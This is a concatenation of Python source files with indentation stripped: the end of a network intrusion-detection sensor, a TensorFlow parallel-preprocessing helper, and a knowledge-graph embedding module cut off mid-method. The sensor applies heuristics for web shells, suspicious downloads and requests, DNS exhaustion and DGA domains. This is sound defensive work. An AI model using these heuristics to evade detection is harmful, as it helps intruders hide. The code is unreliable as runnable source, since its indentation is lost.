for char in SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS:
replacement = SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS[char]
path = path.replace(char, replacement)
if post_data:
post_data = post_data.replace(char, replacement)
if not any(_ in unquoted_path.lower() for _ in WHITELIST_HTTP_REQUEST_PATHS):
if any(_ in unquoted_path for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get((CACHE_TYPE.PATH, unquoted_path))
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_path, re.I | re.DOTALL):
found = desc
break
_result_cache[(CACHE_TYPE.PATH, unquoted_path)] = found or ""
if found:
trail = "%s(%s)" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if any(_ in unquoted_post_data for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get((CACHE_TYPE.POST_DATA, unquoted_post_data))
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_post_data, re.I | re.DOTALL):
found = desc
break
_result_cache[(CACHE_TYPE.POST_DATA, unquoted_post_data)] = found or ""
if found:
trail = "%s(%s \\(%s %s\\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if '.' in path:
_ = _urllib.parse.urlparse("http://%s" % url) # dummy scheme
path = path.lower()
filename = _.path.split('/')[-1]
name, extension = os.path.splitext(filename)
trail = "%s(%s)" % (host, path)
if extension and extension in SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS and not any(_ in path for _ in WHITELIST_DIRECT_DOWNLOAD_KEYWORDS) and '=' not in _.query and len(name) < 10:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "direct %s download (suspicious)" % extension, "(heuristic)"), packet)
elif filename in WEB_SHELLS:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "potential web shell (suspicious)", "(heuristic)"), packet)
else:
for desc, regex in SUSPICIOUS_HTTP_PATH_REGEXES:
if re.search(regex, filename, re.I):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % desc, "(heuristic)"), packet)
break
elif protocol == socket.IPPROTO_UDP: # UDP
_ = ip_data[iph_length:iph_length + 4]
if len(_) < 4:
return
src_port, dst_port = struct.unpack("!HH", _)
_ = _last_udp
_last_udp = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_udp: # skip bursts
return
if src_port != 53 and dst_port != 53: # not DNS
if dst_ip in trails:
trail = dst_ip
elif src_ip in trails:
trail = src_ip
else:
trail = None
if trail:
_ = _last_logged_udp
_last_logged_udp = _last_udp
if _ != _last_logged_udp:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, trail, trails[trail][0], trails[trail][1]), packet)
else:
dns_data = ip_data[iph_length + 8:]
# Reference: http://www.ccs.neu.edu/home/amislove/teaching/cs4700/fall09/handouts/project1-primer.pdf
if len(dns_data) > 6:
qdcount = struct.unpack("!H", dns_data[4:6])[0]
if qdcount > 0:
offset = 12
query = ""
while len(dns_data) > offset:
length = ord(dns_data[offset:offset + 1])
if not length:
query = query[:-1]
break
query += get_text(dns_data[offset + 1:offset + length + 1]) + '.'
offset += length + 1
query = query.lower()
if not query or re.search(VALID_DNS_NAME_REGEX, query) is None or any(_ in query for _ in (".intranet.",)) or query.split('.')[-1] in IGNORE_DNS_QUERY_SUFFIXES:
return
parts = query.split('.')
if ord(dns_data[2:3]) & 0xfa == 0x00: # standard query (both recursive and non-recursive)
type_, class_ = struct.unpack("!HH", dns_data[offset + 1:offset + 5])
if len(parts) > 2:
if len(parts) > 3 and len(parts[-2]) <= 3:
domain = '.'.join(parts[-3:])
else:
domain = '.'.join(parts[-2:])
if not _check_domain_whitelisted(domain): # e.g. <hash>.hashserver.cs.trendmicro.com
if (sec - (_subdomains_sec or 0)) > DAILY_SECS:
_subdomains.clear()
_dns_exhausted_domains.clear()
_subdomains_sec = sec
subdomains = _subdomains.get(domain)
if not subdomains:
subdomains = _subdomains[domain] = set()
if not re.search(r"\A\d+\-\d+\-\d+\-\d+\Z", parts[0]):
if len(subdomains) < DNS_EXHAUSTION_THRESHOLD:
subdomains.add('.'.join(parts[:-2]))
else:
if (sec - (_last_dns_exhaustion or 0)) > 60:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
if re.search(r"bl\b", trail) is None: # generic check for DNSBLs (Note: alternative is to check whitelist)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "potential dns exhaustion (suspicious)", "(heuristic)"), packet)
_dns_exhausted_domains.add(domain)
_last_dns_exhaustion = sec
return
# Reference: http://en.wikipedia.org/wiki/List_of_DNS_record_types
if type_ not in (12, 28) and class_ == 1: # Type not in (PTR, AAAA), Class IN
if "%s:%s" % (dst_ip, dst_port) in trails:
trail = "%s:%s" % (dst_ip, dst_port)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IPORT, "%s (%s)" % (dst_ip, query), trails[trail][0], trails[trail][1]), packet)
elif dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, "%s (%s)" % (dst_ip, query), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
_check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, packet)
elif config.USE_HEURISTICS:
if ord(dns_data[2:3]) & 0x80: # standard response
if ord(dns_data[3:4]) == 0x80: # recursion available, no error
_ = offset + 5
try:
while _ < len(dns_data):
if ord(dns_data[_:_ + 1]) & 0xc0 != 0 and dns_data[_ + 2] == "\00" and dns_data[_ + 3] == "\x01": # Type A
break
else:
_ += 12 + struct.unpack("!H", dns_data[_ + 10: _ + 12])[0]
_ = dns_data[_ + 12:_ + 16]
if _:
answer = socket.inet_ntoa(_)
if answer in trails and not _check_domain_whitelisted(query):
_ = trails[answer]
if "sinkhole" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "sinkholed by %s (malware)" % _[0].split(" ")[1], "(heuristic)"), packet) # (e.g. kitro.pl, devomchart.com, jebena.ananikolic.su, vuvet.cn)
elif "parking" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "parked site (suspicious)", "(heuristic)"), packet)
except IndexError:
pass
elif ord(dns_data[3:4]) == 0x83: # recursion available, no such name
if '.'.join(parts[-2:]) not in _dns_exhausted_domains and not _check_domain_whitelisted(query) and not _check_domain_member(query, trails):
if parts[-1].isdigit():
return
if not (len(parts) > 4 and all(_.isdigit() and int(_) < 256 for _ in parts[:4])): # generic check for DNSBL IP lookups
if not is_local(dst_ip): # prevent FPs caused by local queries
for _ in filter(None, (query, "*.%s" % '.'.join(parts[-2:]) if query.count('.') > 1 else None)):
if _ not in NO_SUCH_NAME_COUNTERS or NO_SUCH_NAME_COUNTERS[_][0] != sec // 3600:
NO_SUCH_NAME_COUNTERS[_] = [sec // 3600, 1, set()]
else:
NO_SUCH_NAME_COUNTERS[_][1] += 1
NO_SUCH_NAME_COUNTERS[_][2].add(query)
if NO_SUCH_NAME_COUNTERS[_][1] > NO_SUCH_NAME_PER_HOUR_THRESHOLD:
if _.startswith("*."):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, "%s%s" % ("(%s)" % ','.join(item.replace(_[1:], "") for item in NO_SUCH_NAME_COUNTERS[_][2]), _[1:]), "excessive no such domain (suspicious)", "(heuristic)"), packet)
for item in NO_SUCH_NAME_COUNTERS[_][2]:
try:
del NO_SUCH_NAME_COUNTERS[item]
except KeyError:
pass
else:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, _, "excessive no such domain (suspicious)", "(heuristic)"), packet)
try:
del NO_SUCH_NAME_COUNTERS[_]
except KeyError:
pass
break
if len(parts) == 2 and parts[0] and '-' not in parts[0]:
part = parts[0]
trail = "(%s).%s" % (parts[0], parts[1])
result = _result_cache.get(part)
if result is None:
# Reference: https://github.com/exp0se/dga_detector
probabilities = (float(part.count(c)) / len(part) for c in set(_ for _ in part))
entropy = -sum(p * math.log(p) / math.log(2.0) for p in probabilities)
if entropy > SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD:
result = "entropy threshold no such domain (suspicious)"
if not result:
if sum(_ in CONSONANTS for _ in part) > SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD:
result = "consonant threshold no such domain (suspicious)"
_result_cache[part] = result or False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, result, "(heuristic)"), packet)
elif protocol in IPPROTO_LUT: # non-TCP/UDP (e.g. ICMP)
if protocol == socket.IPPROTO_ICMP:
if ord(ip_data[iph_length:iph_length + 1]) != 0x08: # Non-echo request
return
elif protocol == socket.IPPROTO_ICMPV6:
if ord(ip_data[iph_length:iph_length + 1]) != 0x80: # Non-echo request
return
if dst_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
except struct.error:
pass
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
def init():
"""
Performs sensor initialization
"""
global _multiprocessing
try:
import multiprocessing
if config.PROCESS_COUNT > 1 and not config.profile:
_multiprocessing = multiprocessing
except (ImportError, OSError, NotImplementedError):
pass
def update_timer():
retries = 0
if not config.no_updates:
while retries < CHECK_CONNECTION_MAX_RETRIES and not check_connection():
sys.stdout.write("[!] can't update because of lack of Internet connection (waiting..." if not retries else '.')
sys.stdout.flush()
time.sleep(10)
retries += 1
if retries:
print(")")
if config.no_updates or retries == CHECK_CONNECTION_MAX_RETRIES:
if retries == CHECK_CONNECTION_MAX_RETRIES:
print("[x] going to continue without online update")
_ = update_trails(offline=True)
else:
_ = update_trails()
update_ipcat()
if _:
trails.clear()
trails.update(_)
elif not trails:
_ = load_trails()
trails.update(_)
_regex = ""
for trail in trails:
if "static" in trails[trail][1]:
if re.search(r"[\].][*+]|\[[a-z0-9_.\-]+\]", trail, re.I):
try:
re.compile(trail)
except:
pass
else:
if re.escape(trail) != trail:
index = _regex.count("(?P<g")
if index < 100: # Reference: https://stackoverflow.com/questions/478458/python-regular-expressions-with-more-than-100-groups
_regex += "|(?P<g%s>%s)" % (index, trail)
trails._regex = _regex.strip('|')
thread = threading.Timer(config.UPDATE_PERIOD, update_timer)
thread.daemon = True
thread.start()
create_log_directory()
get_error_log_handle()
check_memory()
msg = "[i] using '%s' for trail storage" % config.TRAILS_FILE
if os.path.isfile(config.TRAILS_FILE):
mtime = time.gmtime(os.path.getmtime(config.TRAILS_FILE))
msg += " (last modification: '%s')" % time.strftime(HTTP_TIME_FORMAT, mtime)
print(msg)
update_timer()
if not config.DISABLE_CHECK_SUDO and check_sudo() is False:
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
if config.plugins:
config.plugin_functions = []
for plugin in re.split(r"[,;]", config.plugins):
plugin = plugin.strip()
found = False
for _ in (plugin, os.path.join("plugins", plugin), os.path.join("plugins", "%s.py" % plugin)):
if os.path.isfile(_):
plugin = _
found = True
break
if not found:
exit("[!] plugin script '%s' not found" % plugin)
else:
dirname, filename = os.path.split(plugin)
dirname = os.path.abspath(dirname)
if not os.path.exists(os.path.join(dirname, '__init__.py')):
exit("[!] empty file '__init__.py' required inside directory '%s'" % dirname)
if not filename.endswith(".py"):
exit("[!] plugin script '%s' should have an extension '.py'" % filename)
if dirname not in sys.path:
sys.path.insert(0, dirname)
try:
module = __import__(filename[:-3].encode(sys.getfilesystemencoding()))
except (ImportError, SyntaxError) as msg:
exit("[!] unable to import plugin script '%s' (%s)" % (filename, msg))
found = False
for name, function in inspect.getmembers(module, inspect.isfunction):
if name == "plugin" and not set(inspect.getargspec(function).args) & set(("event_tuple', 'packet")):
found = True
config.plugin_functions.append(function)
function.__name__ = module.__name__
if not found:
exit("[!] missing function 'plugin(event_tuple, packet)' in plugin script '%s'" % filename)
if config.pcap_file:
for _ in config.pcap_file.split(','):
_caps.append(pcapy.open_offline(_))
else:
interfaces = set(_.strip() for _ in config.MONITOR_INTERFACE.split(','))
if (config.MONITOR_INTERFACE or "").lower() == "any":
if IS_WIN or "any" not in pcapy.findalldevs():
print("[x] virtual interface 'any' missing. Replacing it with all interface names")
interfaces = pcapy.findalldevs()
else:
print("[?] in case of any problems with packet capture on virtual interface 'any', please put all monitoring interfaces to promiscuous mode manually (e.g. 'sudo ifconfig eth0 promisc')")
for interface in interfaces:
if interface.lower() != "any" and re.sub(r"(?i)\Anetmap:", "", interface) not in pcapy.findalldevs():
hint = "[?] available interfaces: '%s'" % ",".join(pcapy.findalldevs())
exit("[!] interface '%s' not found\n%s" % (interface, hint))
print("[i] opening interface '%s'" % interface)
try:
_caps.append(pcapy.open_live(interface, SNAP_LEN, True, CAPTURE_TIMEOUT))
except (socket.error, pcapy.PcapError):
if "permitted" in str(sys.exc_info()[1]):
exit("[!] permission problem occurred ('%s')" % sys.exc_info()[1])
elif "No such device" in str(sys.exc_info()[1]):
exit("[!] no such device '%s'" % interface)
else:
raise
if config.LOG_SERVER and ':' not in config.LOG_SERVER:
exit("[!] invalid configuration value for 'LOG_SERVER' ('%s')" % config.LOG_SERVER)
if config.SYSLOG_SERVER and not len(config.SYSLOG_SERVER.split(':')) == 2:
exit("[!] invalid configuration value for 'SYSLOG_SERVER' ('%s')" % config.SYSLOG_SERVER)
if config.CAPTURE_FILTER:
print("[i] setting capture filter '%s'" % config.CAPTURE_FILTER)
for _cap in _caps:
try:
_cap.setfilter(config.CAPTURE_FILTER)
except:
pass
if _multiprocessing:
_init_multiprocessing()
if not IS_WIN and not config.DISABLE_CPU_AFFINITY:
try:
try:
mod = int(subprocess.check_output("grep -c ^processor /proc/cpuinfo", stderr=subprocess.STDOUT, shell=True).strip())
used = subprocess.check_output("for pid in $(ps aux | grep python | grep sensor.py | grep -E -o 'root[ ]*[0-9]*' | tr -d '[:alpha:] '); do schedtool $pid; done | grep -E -o 'AFFINITY .*' | cut -d ' ' -f 2 | grep -v 0xf", stderr=subprocess.STDOUT, shell=True).strip().split('\n')
max_used = max(int(_, 16) for _ in used)
affinity = max(1, (max_used << 1) % 2 ** mod)
except:
affinity = 1
p = subprocess.Popen("schedtool -n -2 -M 2 -p 10 -a 0x%02x %d" % (affinity, os.getpid()), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_, stderr = p.communicate()
if "not found" in stderr:
msg, _ = "[?] please install 'schedtool' for better CPU scheduling", platform.linux_distribution()[0].lower()
for distro, install in {("fedora", "centos"): "sudo yum install schedtool", ("debian", "ubuntu"): "sudo apt-get install schedtool"}.items():
if _ in distro:
msg += " (e.g. '%s')" % install
break
print(msg)
except:
pass
def _init_multiprocessing():
"""
Inits worker processes used in multiprocessing mode
"""
global _buffer
global _n
if _multiprocessing:
print("[i] preparing capture buffer...")
try:
_buffer = mmap.mmap(-1, config.CAPTURE_BUFFER) # http://www.alexonlinux.com/direct-io-in-python
_ = b"\x00" * MMAP_ZFILL_CHUNK_LENGTH
for i in xrange(config.CAPTURE_BUFFER // MMAP_ZFILL_CHUNK_LENGTH):
_buffer.write(_)
_buffer.seek(0)
except KeyboardInterrupt:
raise
except:
exit("[!] unable to allocate network capture buffer. Please adjust value of 'CAPTURE_BUFFER'")
print("[i] creating %d more processes (out of total %d)" % (config.PROCESS_COUNT - 1, config.PROCESS_COUNT))
_n = _multiprocessing.Value('L', lock=False)
for i in xrange(config.PROCESS_COUNT - 1):
process = _multiprocessing.Process(target=worker, name=str(i), args=(_buffer, _n, i, config.PROCESS_COUNT - 1, _process_packet))
process.daemon = True
process.start()
def monitor():
"""
Sniffs/monitors given capturing interface
"""
print("[o] running...")
def packet_handler(datalink, header, packet):
global _count
ip_offset = None
try:
dlt_offset = DLT_OFFSETS[datalink]
except KeyError:
log_error("Received unexpected datalink (%d)" % datalink, single=True)
return
try:
if datalink == pcapy.DLT_RAW:
ip_offset = dlt_offset
elif datalink == pcapy.DLT_PPP:
if packet[2:4] in (b"\x00\x21", b"\x00\x57"): # (IPv4, IPv6)
ip_offset = dlt_offset
elif datalink == pcapy.DLT_NULL:
if packet[0:4] in (b"\x02\x00\x00\x00", b"\x23\x00\x00\x00"): # (IPv4, IPv6)
ip_offset = dlt_offset
elif dlt_offset >= 2:
if packet[dlt_offset - 2:dlt_offset] == b"\x81\x00": # VLAN
dlt_offset += 4
if packet[dlt_offset - 2:dlt_offset] in (b"\x08\x00", b"\x86\xdd"): # (IPv4, IPv6)
ip_offset = dlt_offset
except IndexError:
pass
if ip_offset is None:
return
try:
if six.PY3: # https://github.com/helpsystems/pcapy/issues/37#issuecomment-530795813
sec, usec = [int(_) for _ in ("%.6f" % time.time()).split('.')]
else:
sec, usec = header.getts()
if _multiprocessing:
block = struct.pack("=III", sec, usec, ip_offset) + packet
if _locks.count:
_locks.count.acquire()
write_block(_buffer, _count, block)
_n.value = _count = _count + 1
if _locks.count:
_locks.count.release()
else:
_process_packet(packet, sec, usec, ip_offset)
except socket.timeout:
pass
try:
def _(_cap):
global _done_count
datalink = _cap.datalink()
if six.PY3: # https://github.com/helpsystems/pcapy/issues/37#issuecomment-530795813
def _loop_handler(header, packet):
packet_handler(datalink, header, packet)
_cap.loop(-1, _loop_handler)
else:
while True:
success = False
try:
(header, packet) = _cap.next()
if header is not None:
success = True
packet_handler(datalink, header, packet)
elif config.pcap_file:
with _done_lock:
_done_count += 1
break
except (pcapy.PcapError, socket.timeout):
pass
if not success:
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
if config.profile and len(_caps) == 1:
print("[=] will store profiling results to '%s'..." % config.profile)
_(_caps[0])
else:
if len(_caps) > 1:
if _multiprocessing:
_locks.count = threading.Lock()
_locks.connect_sec = threading.Lock()
for _cap in _caps:
threading.Thread(target=_, args=(_cap,)).start()
while _caps and not _done_count == (config.pcap_file or "").count(',') + 1:
time.sleep(1)
print("[i] all capturing interfaces closed")
except SystemError as ex:
if "error return without" in str(ex):
print("\r[x] stopping (Ctrl-C pressed)")
else:
raise
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
finally:
print("\r[i] please wait...")
if _multiprocessing:
try:
for _ in xrange(config.PROCESS_COUNT - 1):
write_block(_buffer, _n.value, b"", BLOCK_MARKER.END)
_n.value = _n.value + 1
while _multiprocessing.active_children():
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
except KeyboardInterrupt:
pass
def main():
for i in xrange(1, len(sys.argv)):
if sys.argv[i] == "-q":
sys.stdout = open(os.devnull, 'w')
if sys.argv[i] == "-i":
for j in xrange(i + 2, len(sys.argv)):
value = sys.argv[j]
if os.path.isfile(value):
sys.argv[i + 1] += ",%s" % value
sys.argv[j] = ''
else:
break
print("%s (sensor) #v%s\n" % (NAME, VERSION))
parser = optparse.OptionParser(version=VERSION)
parser.add_option("-c", dest="config_file", default=CONFIG_FILE, help="configuration file (default: '%s')" % os.path.split(CONFIG_FILE)[-1])
parser.add_option("-i", dest="pcap_file", help="open pcap file for offline analysis")
parser.add_option("-p", dest="plugins", help="plugin(s) to be used per event")
parser.add_option("-q", dest="quiet", action="store_true", help="turn off regular output")
parser.add_option("--console", dest="console", action="store_true", help="print events to console (Note: switch '-q' might be useful)")
parser.add_option("--no-updates", dest="no_updates", action="store_true", help="disable (online) trail updates")
parser.add_option("--debug", dest="debug", action="store_true", help=optparse.SUPPRESS_HELP)
parser.add_option("--profile", dest="profile", help=optparse.SUPPRESS_HELP)
options, _ = parser.parse_args()
read_config(options.config_file)
for option in dir(options):
if isinstance(getattr(options, option), (six.string_types, bool)) and not option.startswith('_'):
config[option] = getattr(options, option)
if options.debug:
config.console = True
config.PROCESS_COUNT = 1
config.SHOW_DEBUG = True
if options.pcap_file:
if options.pcap_file == '-':
print("[i] using STDIN")
else:
for _ in options.pcap_file.split(','):
if not os.path.isfile(_):
exit("[!] missing pcap file '%s'" % _)
print("[i] using pcap file(s) '%s'" % options.pcap_file)
if not config.DISABLE_CHECK_SUDO and not check_sudo():
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
try:
init()
if config.profile:
open(config.profile, "w+b").write("")
cProfile.run("monitor()", config.profile)
else:
monitor()
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
if __name__ == "__main__":
show_final = True
try:
main()
except SystemExit as ex:
show_final = False
if isinstance(get_ex_message(ex), six.string_types):
print(get_ex_message(ex))
os._exit(1)
except IOError:
show_final = False
log_error("\n\n[!] session abruptly terminated\n[?] (hint: \"https://stackoverflow.com/a/20997655\")")
except Exception:
msg = "\r[!] unhandled exception occurred ('%s')" % sys.exc_info()[1]
msg += "\n[x] please report the following details at 'https://github.com/stamparm/maltrail/issues':\n---\n'%s'\n---" % traceback.format_exc()
log_error("\n\n%s" % msg.replace("\r", ""))
print(msg)
finally:
if show_final:
print("[i] finished")
os._exit(0)
|
parallel_preproc.py | import atexit
import itertools
from options import logger
import os
import queue
import threading
import more_itertools
import numpy as np
import tensorflow as tf
import my_itertools
import tfu
import util
def parallel_map_as_tf_dataset(
fun, iterable, *, shuffle_before_each_epoch=False,
extra_args=None, n_workers=10, rng=None, max_unconsumed=256, n_completed_items=0,
n_total_items=None, roundrobin_sizes=None):
"""Maps `fun` to each element of `iterable` and wraps the resulting sequence as
as a TensorFlow Dataset. Elements are processed by parallel workers using `multiprocessing`.
Args:
fun: A function that takes an element from seq plus `extra_args` and returns a sequence of
numpy arrays.
seq: An iterable holding the inputs.
shuffle_before_each_epoch: Shuffle the input elements before each epoch. Converts
`iterable` to a list internally.
extra_args: extra arguments in addition to an element from `seq`,
given to `fun` at each call
n_workers: Number of worker processes for parallelity.
Returns:
tf.data.Dataset based on the arrays returned by `fun`.
"""
extra_args = extra_args or []
# Automatically determine the output tensor types and shapes by calling the function on
# the first element
if not roundrobin_sizes:
iterable = more_itertools.peekable(iterable)
first_elem = iterable.peek()
else:
iterable[0] = more_itertools.peekable(iterable[0])
first_elem = iterable[0].peek()
sample_output = fun(first_elem, *extra_args, rng=np.random.RandomState(0))
output_signature = tf.nest.map_structure(tf.type_spec_from_value, sample_output)
if not roundrobin_sizes:
items = my_itertools.iterate_repeatedly(
iterable, shuffle_before_each_epoch, util.new_rng(rng))
else:
items = my_itertools.roundrobin_iterate_repeatedly(
iterable, roundrobin_sizes, shuffle_before_each_epoch, rng)
# If we are restoring from a checkpoint and have already completed some
# training steps for that checkpoint, then we need to advance the RNG
# accordingly, to continue exactly where we left off.
iter_rng = util.new_rng(rng)
util.advance_rng(iter_rng, n_completed_items)
items = itertools.islice(items, n_completed_items, n_total_items)
if n_workers is None:
n_workers = min(len(os.sched_getaffinity(0)), 12)
if n_workers == 0:
def gen():
for item in items:
yield fun(item, *extra_args, util.new_rng(iter_rng))
else:
gen = parallel_map_as_generator(
fun, items, extra_args, n_workers, rng=iter_rng, max_unconsumed=max_unconsumed)
ds = tf.data.Dataset.from_generator(gen, output_signature=output_signature)
# Make the cardinality of the dataset known to TF.
if n_total_items is not None:
ds = ds.take(n_total_items - n_completed_items)
return ds
def parallel_map_as_generator(fun, items, extra_args, n_workers, max_unconsumed=256, rng=None):
semaphore = threading.Semaphore(max_unconsumed)
q = queue.Queue()
end_of_sequence_marker = object()
should_stop = False
pool = tfu.get_pool(n_workers)
def producer():
for i_item, item in enumerate(items):
if should_stop:
break
semaphore.acquire()
q.put(pool.apply_async(fun, (item, *extra_args, util.new_rng(rng))))
logger.debug('Putting end-of-seq')
q.put(end_of_sequence_marker)
def consumer():
while (future :=q.get()) is not end_of_sequence_marker:
value = future.get()
semaphore.release()
yield value
def stop():
nonlocal should_stop
should_stop = True
pool.close()
pool.terminate()
producer_thread = threading.Thread(target=producer, daemon=True)
producer_thread.start()
atexit.register(stop)
return consumer
|
tensor_models.py | """
KG Sparse embedding
"""
import os
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as functional
import torch.nn.init as INIT
import torch.multiprocessing as mp
from torch.multiprocessing import Queue
from _thread import start_new_thread
import traceback
from functools import wraps
from .. import *
logsigmoid = functional.logsigmoid
def get_device(args):
return th.device('cpu') if args.gpu[0] < 0 else th.device('cuda:' + str(args.gpu[0]))
norm = lambda x, p: x.norm(p=p)**p
get_scalar = lambda x: x.detach().item()
reshape = lambda arr, x, y: arr.view(x, y)
cuda = lambda arr, gpu: arr.cuda(gpu)
def thread_wrapped_func(func):
"""Wrapped func for torch.multiprocessing.Process.
With this wrapper we can use OMP threads in subprocesses
otherwise, OMP_NUM_THREADS=1 is mandatory.
How to use:
@thread_wrapped_func
def func_to_wrap(args ...):
"""
@wraps(func)
def decorated_function(*args, **kwargs):
queue = Queue()
def _queue_result():
exception, trace, res = None, None, None
try:
res = func(*args, **kwargs)
except Exception as e:
exception = e
trace = traceback.format_exc()
queue.put((res, exception, trace))
start_new_thread(_queue_result, ())
result, exception, trace = queue.get()
if exception is None:
return result
else:
assert isinstance(exception, Exception)
raise exception.__class__(trace)
return decorated_function
@thread_wrapped_func
def async_update(args, emb, queue):
"""Asynchronous embedding update for entity embeddings.
How it works:
1. trainer process push entity embedding update requests into the queue.
2. async_update process pull requests from the queue, calculate
the gradient state and gradient and write it into entity embeddings.
Parameters
----------
args :
Global confis.
emb : ExternalEmbedding
The entity embeddings.
queue:
The request queue.
"""
th.set_num_threads(args.num_thread)
while True:
(grad_indices, grad_values, gpu_id) = queue.get()
clr = emb.args.lr
if grad_indices is None:
return
with th.no_grad():
grad_sum = (grad_values * grad_values).mean(1)
device = emb.state_sum.device
if device != grad_indices.device:
grad_indices = grad_indices.to(device)
if device != grad_sum.device:
grad_sum = grad_sum.to(device)
emb.state_sum.index_add_(0, grad_indices, grad_sum)
std = emb.state_sum[grad_indices] # _sparse_mask
if gpu_id >= 0:
std = std.cuda(gpu_id)
std_values = std.sqrt_().add_(1e-10).unsqueeze(1)
tmp = (-clr * grad_values / std_values)
if tmp.device != device:
tmp = tmp.to(device)
emb.emb.index_add_(0, grad_indices, tmp)
class ExternalEmbedding:
"""Sparse Embedding for Knowledge Graph
It is used to store both entity embeddings and relation embeddings.
Parameters
----------
args :
Global configs.
num : int
Number of embeddings.
dim : int
Embedding dimention size.
device : th.device
Device to store the embedding.
"""
def __init__(self, args, num, dim, device):
self.gpu = args.gpu
self.args = args
self.num = num
self.trace = []
self.emb = th.empty(num, dim, dtype=th.float32, device=device)
self.state_sum = self.emb.new().resize_(self.emb.size(0)).zero_()
self.state_step = 0
self.has_cross_rel = False
# queue used by asynchronous update
self.async_q = None
# asynchronous update process
self.async_p = None
def init(self, emb_init):
"""Initializing the embeddings.
Parameters
----------
emb_init : float
The intial embedding range should be [-emb_init, emb_init].
"""
INIT.uniform_(self.emb, -emb_init, emb_init)
INIT.zeros_(self.state_sum)
def setup_cross_rels(self, cross_rels, global_emb):
cpu_bitmap = th.zeros((self.num,), dtype=th.bool)
for i, rel in enumerate(cross_rels):
cpu_bitmap[rel] = 1
self.cpu_bitmap = cpu_bitmap
self.has_cross_rel = True
self.global_emb = global_emb
def get_noncross_idx(self, idx):
cpu_mask = self.cpu_bitmap[idx]
gpu_mask = ~cpu_mask
return idx[gpu_mask]
def share_memory(self):
"""Use torch.tensor.share_memory_() to allow cross process tensor access
"""
self.emb.share_memory_()
self.state_sum.share_memory_()
def __call__(self, idx, gpu_id=-1, trace=True):
""" Return sliced tensor.
Parameters
----------
idx : th.tensor
Slicing index
gpu_id : int
Which gpu to put sliced data in.
trace : bool
If True, trace the computation. This is required in training.
If False, do not trace the computation.
Default: True
"""
if self.has_cross_rel:
cpu_idx = idx.cpu()
cpu_mask = self.cpu_bitmap[cpu_idx]
cpu_idx = cpu_idx[cpu_mask]
cpu_idx = th.unique(cpu_idx)
if cpu_idx.shape[0] != 0:
cpu_emb = self.global_emb.emb[cpu_idx]
self.emb[cpu_idx] = cpu_emb.cuda(gpu_id)
s = self.emb[idx]
if gpu_id >= 0:
s = s.cuda(gpu_id)
# During the training, we need to trace the computation.
# In this case, we need to record the computation path and compute the gradients.
if trace:
data = s.clone().detach().requires_grad_(True)
self.trace.append((idx, data))
else:
data = s
return data
def update(self, gpu_id=-1):
""" Update embeddings in a sparse manner
Sparse embeddings are updated in mini batches. we maintains gradient states for
each embedding so they can be updated separately.
Parameters
----------
gpu_id : int
Which gpu to accelerate the calculation. if -1 is provided, cpu is used.
"""
self.state_step += 1
with th.no_grad():
for idx, data in self.trace:
grad = data.grad.data
clr = self.args.lr
